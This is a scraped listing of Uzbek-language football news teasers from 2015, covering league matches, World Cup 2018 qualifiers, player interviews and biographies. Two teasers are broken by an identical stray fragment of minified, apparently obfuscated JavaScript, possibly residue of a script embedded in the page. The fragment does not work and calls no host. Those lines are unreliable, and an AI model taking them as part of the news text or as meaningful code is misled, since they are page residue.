Ўзбекистон Профессионал футбол лигаси ва “Championat.asia” ҳамкорлигида ташкил этилган ой лауреатларининг август ойи ғолиблари аниқланди.
Киритилди: 17:00, 17.09.2015. Ўқилди: 2765 марта. Фикрлар сони: 1 та.
Бугун ўзбек футболининг тирик афсонаси Миржалол Қўшоқович 45 ёшни қарши олмоқда. Бу инсонни нафақат футболга ихлосманд инсонлар балки бутун ўзбек ахли фахр билан тилга олади.
Киритилди: 15:11, 17.09.2015. Ўқилди: 5987 марта. Фикрлар сони: 35 та.
Ўзбекистонлик ёш истеъдодли футболчи Сардор Рашидов ўзининг спорт карьерасини белгилашда кўпроқ пул топишни эмас, балки юқори савияга чиқиш ҳақида кўпроқ ўйлади. Бу ҳақда футболчининг отаси Ихтиёр Рашидов айтиб ўтди.
Киритилди: 22:08, 15.09.2015. Ўқилди: 5256 марта. Фикрлар сони: 4 та.
Шу кунларда Германия футбол иттифоқи (DFB) томонидан ушбу мамлакатнинг Хеннеф шаҳридаги спорт мактабида анъанавий халқаро мураббийлик курслари ўтказиляпти.
Киритилди: 14:39, 15.09.2015. Ўқилди: 3785 марта. Фикрлар сони: 3 та.
Давоми. Бошланиши газетамизнинг аввалги сонларида. Футболимиз тарихидаги энг ёрқин ҳужумчилардан бири Игорь Шквириннинг фаолият йўлини ўз ичига олган биографик асар (муаллиф - Владимир Сафаров) шарҳини давом эттирамиз.
Киритилди: 15:32, 13.09.2015. Ўқилди: 3676 марта. Фикрлар сони: 1 та.
Ўзбекистон – улкан иқтидор эгаларига бой мамлакат. Хусусан, футболда ҳам келажаги порлоқ дея эътироф этилаётган ёш истеъдод соҳиблари юртимизнинг ҳар бир чеккасидан етарлича топилади.
Киритилди: 14:26, 13.09.2015. Ўқилди: 4720 марта. Фикрлар сони: 3 та.
Александр Гейнрих терма жамоага қайтишини ажойиб гол билан нишонлади. Умуман олганда, у миллий жамоамиз сафида 84-ўйинини ўтказди.
Киритилди: 10:17, 13.09.2015. Ўқилди: 2881 марта. Фикрлар сони: 3 та.
Хабарингиз бор, яқинда Жаҳон Чемпионати-2018 иккинчи саралаш босқичи доирасида Ўзбекистон миллий терма жамоамиз 3-4-тур учрашувларини ўтказди.
Киритилди: 13:12, 11.09.2015. Ўқилди: 5572 марта. Фикрлар сони: 8 та.
“Орол” – “Хотира-79”(1:0) жамоалари учрашувида ягона голга муаллифлик қилиб, учрашув қаҳрамонига айланган Нукусликлар ҳужумчиси Ойбек Рўзимов учрашув ҳақидаги фикрларини билдириб ўтди.
Киритилди: 12:47, 11.09.2015. Ўқилди: 2868 марта. Фикрлар сони: 2 та.
Соғлиқ - ҳар нарсадан устун. Шу боис тиббий кўрик масаласига жиддийроқ ёндашиш талаб этилади. Сўнгги йилларда юртимизда футболчилар соғлиғига жиддий эътибор қаратилаётгани бежиз эмас.
Киритилди: 16:11, 10.09.2015. Ўқилди: 3443 марта. Фикрлар сони: 1 та.
ПСЖ футболчиси Эсекьель Лавессини ҳамкасбимиз Дмитрий Михайлович бир қарашдаёқ кимга ўхшашини айтди.
Киритилди: 09:39, 09.09.2015. Ўқилди: 9346 марта. Фикрлар сони: 8 та.
Ўзбекистон, Тошкент, 12news.uz – Ўзбек футболи саҳифаларини варақласангиз, унда Абдураимовлар сулоласи катта ўрин эгаллашига гувоҳ бўласиз. Сулоланинг дастлабки вакили Биродар Абдураимов ўзбек футболининг илк юлдузлари сирасига киради.
Киритилди: 09:28, 08.09.2015. Ўқилди: 4132 марта. Фикрлар сони: 2 та.
Бугунги кунда Украинанинг «Рух» ҳаваскорлар футбол клубида тўп сураётган ҳамюртимиз Максим Шацких фаолиятидан мамнун.
Киритилди: 11:55, 07.09.2015. Ўқилди: 3844 марта. Фикрлар сони: 3 та.
Давралар оралиғида асосан Тошкентда шуғулланиб, таркибни кучайтиришга катта аҳамият берган «Навбаҳор» жамоаси ҳам ўз сафини бир неча янги ўйинчилар билан кучайтира олди. Хусусан клуб давралар оралиғи вақтида Алибобо Раҳматтуллаевни таркибига қўшиб олди.
// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;eКиритилди: 12:29, 05.09.2015. Ўқилди: 3163 марта. Фикрлар сони: 2 та.
Хабарингиз бор, Жаҳон чемпионати-2018 иккинчи саралаш босқичи “H” гуруҳи 3-тури доирасида Ўзбекистон миллий терма жамоаси Яманга қарши майдонга тушиб, кичик ҳисобида ғалаба қозонди.
// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;eКиритилди: 11:17, 05.09.2015. Ўқилди: 4896 марта. Фикрлар сони: 6 та.
“Қизилқум”нинг қорақалпоғистонлик тарбияланувчиси Наврўз Алимов биз билан бўлган суҳбатнинг учнчи қисмида қисқа ва лўнда саволларга жавоб қайтариб ўтди.
Киритилди: 17:30, 03.09.2015. Ўқилди: 7120 марта. Фикрлар сони: 7 та.
Киритилди: 18:06, 30.08.2015. Ўқилди: 5117 марта. Фикрлар сони: 5 та.
Ўзбекистон миллий терма жамоасининг учинчи кунги машғулотларига жамоамиз сардори Сервер Жепаров келиб қўшилди.
Корея К-лигасида тўп тепаётган футболчимизнинг янги имиджи бизни ўзига жалб қилди.
Киритилди: 12:18, 30.08.2015. Ўқилди: 4482 марта. Фикрлар сони: 2 та.
Ўзбекистон 24-миллий чемпионати 19-турининг кутилмаган натижаси Қаршида қайд этилди, десак хато бўлмаса керак. Ўз майдонида чемпионат аутсайдери - «Бухоро»ни қабул қилган «Насаф» қимматли икки очкодан маҳрум бўлди.
Киритилди: 14:06, 29.08.2015. Ўқилди: 3443 марта. Фикрлар сони: 1 та.
Ўзларини ниҳоятда камтар олиб мен кўпроқ мухлисман дейдиган таниқли футбол журналисти Ҳасанали ота куни кеча “Локомотив” футболчилари учрашди.
Киритилди: 20:15, 27.08.2015. Ўқилди: 3691 марта. Фикрлар сони: 3 та.
Эртага футбол бўйича Ўзбекистон 24-миллий чемпионати олий лигасида 19-тур учрашувларига старт берилади
Киритилди: 18:59, 27.08.2015. Ўқилди: 3286 марта. Фикрлар сони: 1 та.
"Машъал" ўтган турни сафарда "Олмалиқ"қа қарши ўтказди. Ушбу учрашувдан сўнг жамоамизнинг биринчи голи муаллифи Зафар Тўраев ўйин ҳақида фикрларини билдириб ўтди.
Киритилди: 11:03, 26.08.2015. Ўқилди: 2602 марта. Фикрлар сони: 1 та.
Олий лига 19-тур доирасидаги «Андижон» - «Қўқон-1912» жамоалари ўртасида бўлиб ўтган учрашувдан сўнг қўқонликлар ҳимоячиси Илҳом Комиловни суҳбатга тортдик.
Киритилди: 10:35, 26.08.2015. Ўқилди: 2387 марта. Фикрлар сони: 1 та.